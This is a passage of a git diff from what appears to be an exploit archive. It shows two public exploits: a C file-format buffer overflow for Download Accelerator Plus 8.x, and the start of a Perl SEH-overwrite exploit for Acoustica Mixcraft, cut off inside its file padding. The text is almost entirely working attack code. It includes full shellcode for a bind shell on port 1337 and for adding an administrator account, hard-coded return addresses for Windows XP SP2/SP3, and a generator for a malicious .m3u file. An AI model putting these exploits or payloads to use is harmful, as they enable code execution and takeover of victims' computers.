nops2[30]='\0'; - if(atoi(argv[1])==0) ra=ra_sp2; - else ra=ra_sp3; - if(atoi(argv[2])==0) scode=bind_scode; - else scode=user_scode; - f=fopen("sploit.m3u","wb"); - fprintf(f,"http://localhost/%s%s%s%s.mp3%c%c",nops1,ra,nops2,scode,'\xd','\xa'); - fflush(f); - fclose(f); - printf("sploit.m3u created!\n"); - return EXIT_SUCCESS; -} - -// milw0rm.com [2008-07-11] +#include +#include +/* +DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English + +SecurityFocus Advisory: +Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability +because it fails to perform adequate 
boundary checks on user-supplied input. +Successfully exploiting this issue may allow remote attackers to execute +arbitrary code in the context of the application.Failed exploit attempts +will cause denial-of-service conditions. + +Vulnerability discoverd by Krystian Kloskowski (h07) +Original POC by h07 http://www.milw0rm.com/exploits/6030 + +This poc will create a "special" .m3u file that when imported in DAP and then checked with +the verifiy button will cause a buffer overflow and lead to exploitation.Run the program +with no args for usage info or just look in the code. :P + +Tested on Windows XP English sp2&sp3. + +C Exploit code by Shinnok raydenxy [at] yahoo dot com +/* + +/* win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */ +unsigned char bind_scode[] = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" +"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58" +"\x4e\x36\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x48\x4e\x57" +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48" +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" +"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x58" +"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x44" +"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x48" +"\x49\x38\x4e\x36\x46\x32\x4e\x51\x41\x36\x43\x4c\x41\x33\x4b\x4d" +"\x46\x36\x4b\x38\x43\x54\x42\x53\x4b\x38\x42\x34\x4e\x50\x4b\x58" +"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x55\x4a\x36" 
+"\x50\x58\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" +"\x43\x55\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x47" +"\x44\x53\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e" +"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x50" +"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" +"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x44" +"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x45\x50" +"\x49\x43\x48\x56\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" +"\x4c\x31\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x31" +"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d" +"\x4a\x36\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d" +"\x42\x55\x46\x55\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" +"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x46" +"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x55\x49\x42\x4e\x4c" +"\x49\x58\x47\x4e\x4c\x46\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x42" +"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" +"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x44\x4f\x4f" +"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x46" +"\x41\x50\x41\x35\x41\x45\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36" +"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" +"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" +"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d" +"\x4f\x4f\x42\x4d\x5a"; + +/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */ +unsigned char user_scode[] = 
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57" +"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" +"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" +"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" +"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54" +"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" +"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" +"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47" +"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" +"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" +"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39" +"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46" +"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36" +"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36" +"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37" +"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44" +"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42" +"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36" +"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46" +"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37" 
+"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52" +"\x41\x34\x46\x34\x46\x34\x42\x30\x5a"; + + + +unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll +unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll + +unsigned char nops1[14115]; //14115 * \x90 +unsigned char nops2[30]; //30 * \x90 + +int main(int argc, char **argv) +{ + int i; + FILE* f; + char* ra=NULL; + char* scode=NULL; + printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n"); + printf("[+] Discovered by Krystian Kloskowski (h07) \n"); + printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n"); + if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){ + printf("Usage: %s target payload\n",argv[0]); + printf("Where target is:\n"); + printf("0: WinXP SP2\n"); + printf("1: WinXP SP3\n"); + printf("Where payload is:\n"); + printf("0: bind shell on 1337\n"); + printf("1: add admin user \"test\" with password \"test\"\n"); + return EXIT_SUCCESS; + } + for(i=0;i<14115;i++) nops1[i]='\x90'; + nops1[14115]='\0'; + for(i=0;i<30;i++) nops2[i]='\x90'; + nops2[30]='\0'; + if(atoi(argv[1])==0) ra=ra_sp2; + else ra=ra_sp3; + if(atoi(argv[2])==0) scode=bind_scode; + else scode=user_scode; + f=fopen("sploit.m3u","wb"); + fprintf(f,"http://localhost/%s%s%s%s.mp3%c%c",nops1,ra,nops2,scode,'\xd','\xa'); + fflush(f); + fclose(f); + printf("sploit.m3u created!\n"); + return EXIT_SUCCESS; +} + +// milw0rm.com [2008-07-11] diff --git a/platforms/windows/local/6322.pl b/platforms/windows/local/6322.pl index 0834c6778..3407af88b 100755 --- a/platforms/windows/local/6322.pl +++ b/platforms/windows/local/6322.pl 
@@ -1,261 +1,261 @@
-#!/usr/bin/perl
-#
-# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
-# Author: Koshi
-#
-# Date: 08-28-08 ( 0day )
-# Application: Acoustica Mixcraft
-# Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
-# Site: http://acoustica.com/mixcraft/download.htm
-# Tested On: Windows XP SP3 Fully Patched
-#
-# A vulnerability exists in an unchecked buffer located in the
-# project files (.mx4) for Acoustica Mixcraft4. The buffer should
-# contain the file name of an image located in
-# "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
-# install of Mixcraft, and would be used as the icon for a specific
-# "track" or "instrument" in Mixcraft.
-#
-# gr33tz: Rima my baby, str0ke, breaker_unit, mess', and my dude who
-# showed me this nifty program.
-#
-
-
-# win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
-my $shellcode =
-"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
-"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
-"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
-"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
-"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
-"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
-"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
-"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
-"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
-"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
-"\xbd\x53\x64\xee\xc1";
-
-my $bof = "A"x324;
-my $sled = "\x90"x35;
-my $fill = "\x90"x468;
-my $buff = "".
- "$bof".
- "\xeb\x06\x90\x90". ### Pointer to next SEH record (Boing!) ###
- "\x28\x12\x8b\x01". ### SE handler 0x018b1228 ( wmaengine.dll POP POP RET ) ###
- "$sled".
- "$shellcode".
- "$fill";
-
-my $tuff = "".
- "\x52\x49\x46\x46\xC4\x0F\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00". - "\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73". - "\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C". - "\x4D\x79\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x52\x65\x63\x6F". - "\x72\x64\x69\x6E\x67\x73\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - 